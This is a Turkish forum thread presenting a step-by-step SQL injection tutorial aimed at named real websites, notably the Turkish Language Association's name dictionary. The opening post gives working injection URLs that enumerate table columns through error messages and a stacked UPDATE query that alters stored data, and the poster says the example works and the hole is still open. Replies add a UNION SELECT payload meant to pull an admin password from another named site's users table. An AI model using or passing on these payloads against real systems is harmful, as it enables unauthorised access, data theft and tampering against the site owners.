

SQL INJECTION Nasıl Yapılır Örnek
-
eğitim amaçlıdır başkası bu hatayı yaptı siz yapmayın diye yazılmıştır.
öncelikle sql injection yemesi muhtemel sayfalar asp php gibi kod kontrolunun ek işlemle yapılabildiği sayfalardır. genelde millet buna üşendiği için boyle açıklar bırakıyorlar. öncelikle bir sitede sql açığının olup olmadığını anlamak için boş alanlara tek tırnak girerek yada URL lerdeki id=212 gibi yerlere harf yada tek tırnak koyarak anlarız. bunun sonucunda hata alıyorsanız. o sitede boyle bir açık vardır. gelelim ornek uygulamamıza.http://www.tdk.org.tr/adsozlugu/ayrinti.asp?id=450%20having%201=1
adress bara kopyalıyoruz va url ye gidiyoruz. şu hatayı alıcaz.
URL deki 450 rakamı uydurmadır siz sağlam bi tane sozcuk id si bulun.
Hata Tipi:Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'adlar.id'
is invalid in the select list because it is not contained in an
aggregate function and there is no GROUP BY clause./adsozlugu/ayrinti.asp, line 54
niye having 1=1 yazdık ona gelelim. having sozcuğu group by ile birlikte kullanılır. ve
having de tanımlı oğe yok ise
primary key olan alanı default alır. buda en azından tablo ismi ile primary key olan alanı hataya ekler.http://www.tdk.org.tr/adsozlugu/ayrinti.asp?id=450%20group%20by%20adlar.id%20having%201=1
şimdi
having 1=1 den once group by adlar.id yi ekledik yine having de
tanımlı oğe yok şimdi bu seferde şu hatayı alıyoruz.Hata Tipi:Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'adlar.adi' is invalid in
the select list because it is not contained in either an aggregate
function or the GROUP BY clause./adsozlugu/ayrinti.asp, line 54
bu sefer ne oldu having de tanımlı oğe yok group by da primary key var. bu sefer ikinci sutunu ekledi yine devam
ediyoruz bunuda ekliyoruz url ye ve boyle devam ediyoruz.http://www.tdk.org.tr/adsozlugu/ayrinti.asp?id=450%20group%20by%20adlar.id%20,adlar.adi,adlar.kokeni,adlar.anlami,adlar.adi2,adlar.cinsiyet%20having%201=1
sonunda hata vermeyene kadar devam ettik ve elimizde full tablo adları var artık.
artık sql kodlarımızı sokabiliriz. simdihttp://www.tdk.org.tr/adsozlugu/ayrinti.asp?id=450
gidiyoruz ; (noktalı virgül) koyduk tan sonra sql cümlemizi yazıyoruz.
orenğinhttp://www.tdk.org.tr/adsozlugu/ayrinti.asp?id=450; update adlar set adlar.anlami='deneme' where adlar.id=450
sql i salladım siz uygun olanını yaparsınız -
abi saat 1.48 ha onuda hatırlatayım da :D
-
bu dokumanı başka bir yerde gördüyseniz burdan çalmışlardır. daha simdi kendim yazdım.
-
yanlış anladın heralde hoja yani biraz saat 2de niye böyle bişey yazdın onu merak ettim :D
-
tdk deli etti beni ondan yazdım.
bu arada yukarıdaki ornek çalışıyor. ama denemeyin tamam mı? :D -
abi eline sağlık ta ama saate bak gidin yatın yaw. yada irc.tahribat.com 'a girin canımız sıkılıyo orda
-
hid=66%20union // bu 66%20 nedir
0,0,0,0,0,0 böle şeyler ne anlama geliyo ?
-
sağol hoca hakkatten çalışoo...
-
%20 boşluk manasına geliyor. union ise aynı sutun sayısını döndüren iki sql i bağlar. satır sayıları aynı olsun diye. 0,0... gibi fazladan sutun ekliyolar. union kullanmak için tablo yapısını bilmen lazım. örneğin o sql cümlesi username yi dondurmuyor ise. sen union ile sql i donduren bir cumle yazıyosun. diyelim o sayfa topicname değeri donduruyor sa sen username as topicname diyorsun var boylece ilk topicname alanının üzerine ikinici sql username adını yazıyor. sayfada da username i görüyorsun.
-
ibosoft bunu yazdı:
hid=66%20union // bu 66%20 nedir
0,0,0,0,0,0 böle şeyler ne anlama geliyo ?
hoja 0,0,0,0,0,0 bnm bildigm onlar column sayısı normalde tek sıfır koyarsın ,bulamazsa buldurana kr eklemeye dewam edersin 0,0,0,0,0,0,0,0,0,0,0,00,0,0,0,0,0,0,0,0,0,0,0 gibi
örnegin: www.rapboy.com/profil.php/view&id=44=-1+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+users+where+id=44 bulana kdr sıfırları artırıcn.. profil kartından adminin şifresini mesela id=44 adminin id si dr. örnegin yani
-
dava açmasınalar m.q :D tagext in 3 ay once uyarmasına rağmen hala bu acık var ve foruma 1 ay sonrasında yayınlandı yani 4aydır bu acık devam ediyor. kapatmadılar. illa gel hergün zik at diyorlar. ama nabalım yüce devletimizin sitesi :))